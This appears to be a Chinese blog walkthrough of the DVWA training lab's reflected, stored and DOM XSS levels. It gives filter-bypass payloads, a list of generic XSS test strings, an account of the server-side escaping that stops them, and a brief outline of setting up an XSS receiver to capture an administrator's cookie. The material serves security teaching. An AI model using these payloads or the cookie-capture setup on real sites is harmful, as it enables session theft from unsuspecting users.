DVWA XSS总结

最新推荐文章于 2024-06-11 14:40:18 发布
最新推荐文章于 2024-06-11 14:40:18 发布
阅读量573 收藏 2
点赞数 1
分类专栏: Web安全 文章标签: web 安全漏洞 xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927266/article/details/119964104
版权

笔者对该靶场所需的相关知识进行了总结、拓展,供大家学习参考:XSS 漏洞学习

DVWA XSS(Reflected)

low

未进行过滤,构造payload:<script>alert("x");</script>
在这里插入图片描述

medium

过滤规则:把< script>用str_replace()函数替换为空。

尝试双写<script>标签:<sc<script>ript>alert("x");</sc</script>ript>-->
发现返回hello ript>:问题很奇怪,查看源码,发现:</sc</script>ript>没有被过滤,仅过滤了
<script>标签,所以加载payload:<sc<script>ript>alert("x");</script>弹窗
		<pre>
			Hello
			<script>
				alert("x");</sc
			</script>
			ript>
		</pre>
------------------------------
试一下改变大小写,加载payload:<sCrIPt>alert("x");</sCrIpT>弹窗,说明没有对大小写过滤
------------------------------

在这里插入图片描述

high

过滤规则:$name = preg_replace( ‘/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i’, ‘’, $_GET[ ‘name’ ] ); 对任何模式的script都过滤了,换标签尝试:<img src=0 onerror=alert("xss")>
在这里插入图片描述

impossible

服务器端核心代码:
<?php 
// Is there any input? 
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { 
	// Check Anti-CSRF token 
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 
  	// Get input 
 	$name = htmlspecialchars( $_GET[ 'name' ] ); 
 	// Feedback for end user 
 	echo "<pre>Hello ${name}</pre>"; 
} 
// Generate Anti-CSRF token 
generateSessionToken(); 
?>
-------------------------------------------------
可以看到,Impossible级别的代码使用htmlspecialchars函数把预定义的字符&、”、 ’、<、>转换为 HTML 实体,

防止浏览器将其作为HTML元素。

可以看出,impossible级别的代码先判断name是否为空,不为空的话然后验证其token,来防范CSRF攻击。

然后再用	htmlspecialchars函数将name中的预定义字符转换成html实体,这样就防止了我们填入标签

当我们输入 <script>alert('hack')</script> 时,因为 htmlspecialchars 函数会将 < 和 > 转换成html实体,并且${name}取的是$name的值,

然后包围在<pre></pre>标签中被打印出来,所以我们插入的语句并不会被执行。

当我们提交<script>alert("hack");</script>时,通过可以查看源代码,表单提交的过程中,把我们的user_token也一并提交了,

来和服务器端的session_token做验证,防止CSRF攻击。我们输入的代码,直接被当成html文本给打印出来了,并不会被当成js脚本执行

DVWA XSS(Stored)

------------------------------
相关函数介绍

trim(string,charlist)

函数移除字符串两侧的空白字符或其他预定义字符,预定义字符包括、\t、\n、\x0B、\r以及空格,

可选参数charlist支持添加额外需要删除的字符。

mysql_real_escape_string(string,connection)

函数会对字符串中的特殊符号(\x00,\n,\r,\,‘,“,\x1a)进行转义。

stripslashes(string)

函数删除字符串中的反斜杠。

------------------------------

low

未进行过滤,构造payload:

name=1
message=<script>alert("x");</script>

在这里插入图片描述

medium

strip_tags() 函数剥去字符串中的HTML、XML以及PHP的标签,(未过滤使用<b>标签)。

addslashes() 函数返回在预定义字符(单引号、双引号、反斜杠、NULL)之前添加反斜杠的字符串。

可以看到,由于对message参数使用了htmlspecialchars函数进行编码,因此无法再通过message参数

注入XSS代码,但是对于name参数,只是简单过滤了<script>字符串,仍然存在存储型的XSS。

直接尝试payload:

name=1
message=<script>alert("x");</script> 不弹窗

应该是标签被过滤了,换标签尝试:

name=2
message=<img src=0 οnerrοr=alert(“xss”)> 也不弹窗

在这里插入图片描述
构造payload:

name=<sc<script>ript>alert("x");</script>
message=123

在这里插入图片描述
在这里插入图片描述
action two:大小写

name=<sCrIPT>alert("x");</sCrIPT>
message=123

action three:换标签

name=<img src=0 onerror=alert("x")>
message=123

high

构造payload:

name=<img src=0 onerror=alert("x")>
message=123

impossible

通过使用htmlspecialchars函数,解决了XSS,所以无法注入。

通常有一些方式可以测试网站是否有正确处理特殊字符:

><script>alert(document.cookie)</script>

='><script>alert(document.cookie)</script>

"><script>alert(document.cookie)</script>

<script>alert(document.cookie)</script>

<script>alert (vulnerable)</script>

%3Cscript%3Ealert('XSS')%3C/script%3E

<script>alert('XSS')</script>

<img src="javascript:alert('XSS')">

<img src="http://xxx.com/yyy.png" onerror="alert('XSS')">

<div style="height:expression(alert('XSS'),1)"></div>(这个仅于IE7(含)之前有效)

DVWA XSS(DOM)

low

没有过滤,只是通过选择框限制了输入,直接在URL中构造payload:<script>alert("x");</script>
在这里插入图片描述

medium

使用stripos对"<script"进行过滤,并且不区分大小写,如果有则置为English
	 1.此时查看源码:
	 <select name="default">
		<option value="" disabled="disabled">----</option>
		<option value="English">English</option>
		<option value="French">French</option>
		<option value="Spanish">Spanish</option>
		<option value="German">German</option>
		<input value="Select" type="submit">
	</script>
	2.输入的值会在value中显示,直接<script>alert("x");</script>被过滤,换用标签
		使用payload:<img src=1 onerror=alert("xss")>
		此时:
			<option value="%3Cimg%20src=1%20onerror=alert(%22xss%22)%3E"></option>
			<option value="" disabled="disabled">----</option>
			<option value="English">English</option>
			<option value="French">French</option>
			<option value="Spanish">Spanish</option>
			<option value="German">German</option>
			</select>
		发现标签未被显示,接着想办法闭合标签<select>和<select>让我们的payload加载到html
		中能被执行:</option></select><img src=1 onerror=alert("xss")>
		当然也可直接闭合<select>:payload:</select><img src=1 onerror=alert("xss")>

构造payload:</select><img src=0 οnerrοr=alert(“x”)>
在这里插入图片描述

high

high级别的代码先判断defalut值是否为空,如果不为空,则用switch语句进行匹配。如果匹配成功,则插入case字段的相应值。如果匹配失败,则插入默认的值。此时,可以在URL中添加注释符#,注释的内容不会提交到服务器,而是在浏览器执行。

构造payload:English # <script>alert("x");
在这里插入图片描述

impossible

impossible级别只告诉我了这一句话:# Don’t need to do anything, protction handled on the client side ,当我们尝试注入时,我们注入的内容都会经过URL编码显示在输入框,经过URL编码的内容被放在HTML标签中,而没有经过解码,所以不存在注入。

获取cookie

首先下载清华蓝莲花战队开发的XSS平台

https://github.com/trysec/BlueLotus_XSSReceiver

下载后直接拖到phpstudy的WWW文件中,访问相应链接开始安装即可。
image-20210107185039709
安装完成后进入后台来新建自己的一个项目,插入了一个常见的模板,修改好website的值,为源码所在的文件夹,再修改一行明显的文字作为攻击成功的提示。
image-20210107190729950
生成专属的payload。
image-20210107191153852
利用xss获取管理员的cookie。
在这里插入图片描述
在这里插入图片描述

iO快到碗里来
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-XSS(Stored)
自强不息
01-15 421
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
DVWA简介及安装
qq_54727885的博客
11-26 7935
DVWA简介: DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA 一共包含了十个攻击模块,分别是:Brute Force(暴力(破解))、Command Injection(命令行注入)、CSRF(跨站请求伪造)、- File Inclusion(文件包含)、File Upload(文件上传)、Ins
XSS攻击绕过方法大全,XSS攻击技巧,收集100种绕过方法分享(2024最新)_xss绕过
weixin_42340783的博客
06-11 1343
尽管许多网站实施了输入过滤措施来防止跨站脚本(XSS)攻击,但在特定条件下,经过精心编码的脚本仍有可能实施XSS注入。本文旨在为专业的安全测试人员提供一个跨站脚本漏洞的检测指南。
XSS注入
weixin_61804402的博客
04-04 1026
综上存储型的 XSS 危害最大。由于存储在服务器端的特性,不需要攻击者和被攻击者 有任何接触,只要被攻击者访问了页面就会遭受攻击。反观反射型和 DOM 型的 XSS 则需要攻击者去诱使用户点击其构造的恶意的URL,和用户有直接或者间接的接触。
XSS注入基础入门篇
好好睡觉
02-17 4866
XSS注入基础,XSS注入原理,XSS注入分类
XSS注入进阶练习篇(一)XSS-LABS通关教程
好好睡觉
02-18 3116
XSS注入靶场、XSS-LABS通关教程
xss-dvwa靶场详情
04-06
dvwa靶场中的xss漏洞详情
DVWA下的XSS
07-25
DVWA下的XSS
DVWA靶场搭建与使用
09-02
**DVWA靶场搭建与使用** DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,专门为网络安全专业人员、开发人员和学生设计,用于学习和练习常见Web应用漏洞的识别和利用。它提供了多种安全漏洞的...
dvwa靶场,里面也有xss靶场
09-24
DVWA中的XSS靶场通常包含反射型XSS、存储型XSS和DOM型XSS三个部分,每个部分都有不同级别的难度,让用户逐步理解XSS的原理和防御方法。 2. **数据库连接配置** 在DVWA中,数据库连接信息位于`DVWA-master\config`...
DVWA Installation
08-15
它包含了各种常见Web应用漏洞,如SQL注入、跨站脚本(XSS)、文件包含漏洞等,是安全专业人士进行渗透测试和学习Web安全的实践平台。 在开始安装过程之前,你需要确保你的系统满足以下基本要求: 1. **操作系统**:...
网络安全靶场(dvwa).7z
01-29
该靶场适合新手入门和老手进行一些相应的实验,该靶场进行了一定的改写。
XSS注入的原理与实现
LJH1999ZN的博客
02-17 4438
一、JavaScript的常用脚本 1.window.location.href 用来跳转页面 eg:<script>window.location.href='www.jd.com'</script> 2.document.cookie 获取客户端的cookie值 3.script 可以通过“src”属性引入JavaScript文件 二、什么是同源策略 同源策略在web应用的安全模型中是一个重要概念。在这个策略下,web浏览器允许第一个页面的脚本访问第...
XSS原理&dvwa&xssvalidator使用
qq_33163046的博客
08-07 1万+
渗透COP之XSS原理&测试案例 1.什么是XSS 跨站脚本(Cross Site Scripting,XSS)是一种经常出现在web应用程序中的计算机安全漏洞。攻击者利用网站漏洞把恶意的代码注入到网页之中。当其他用户浏览到这些网页后,就会执行其中的恶意代码,对受害用户可能采取cookie资料截取、会话劫持、钓鱼欺骗等各种攻击。 Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,C.
XSS注入原理以及一些绕过姿势
热门推荐
qq_37019068的博客
10-09 1万+
介绍 XSS——跨站脚本攻击。通过这个攻击手段,攻击者可以将恶意的 JavaScript 代码插入存在 XSS 漏洞的 Web 页面中,当用户浏览带有恶意代码的页面时,这些恶意代码会被触发,从而达到攻击的目的。可以说,XSS 是针对用户层面的攻击。 XSS的分类 通常,我们吧XSS分为三个类型,即 存储型,反射型与DOM型。不同的类型原理各有差异,而且注入的点也不同。 存储型 存储型的XSS,最大的特点是可持久化,因为在过滤条件差的情况下,存储型的XSS的恶意代码会直接被保存在服务器端的数据库中。而这个恶意
xssdvwa平台下的实战
Night May Say
05-19 6266
课堂上要求学生自由组队准备一个安全相关的主题讲解,于是会兴冲冲的找到学霸想抱大腿。最近应大腿的需求,决定要补充ppt一部分内容以掩盖我们打酱油的真面目,大胖这里是学霸的外号的意思是一个酱油的技术点太酱油,两个酱油的技术点拼起来就刁刁的叻! 前一篇酱油技术是 登陆会话劫持 还有一个酱油技术就是本文了。 也是醉了,后来确定的主题竟然是如何帮助同学查看室友空间,更醉的是,这种猥琐的事情要让我来做!
DVWA的使用6--XSS(Stored)(存储型跨站脚本)
StoriesWine
03-27 4922
DVWA的使用6–XSS(Stored)(存储型跨站脚本) Stored Cross Site Scripting(XSS)存储型跨站脚本攻击会把用户输入的数据存储在服务器端。如果web应用程序从恶意用户处收集了输入数据并将这些数据存储在数据库中以供以后使用,就会发生储存式跨站点脚本。 1).low级别 源码: trim函数移除字符串两侧的空白字符或其他预定义字符,预定义字符包括、\...
dvwa靶场练习存储型XSS
weixin_43873557的博客
09-10 295
安全等级为Low 复制代码 <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message input $message = stripslashes( $message ); $message = ((
dvwa xss小游戏
最新发布
07-09
dvwa是一个非常流行的Web安全教程平台,其中包含了一个名为XSS(Cross-Site Scripting,跨站脚本攻击)的小游戏部分。这个小游戏的设计目的是让学习者亲身体验和理解XSS漏洞。在游戏中,玩家通常需要在输入框中插入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值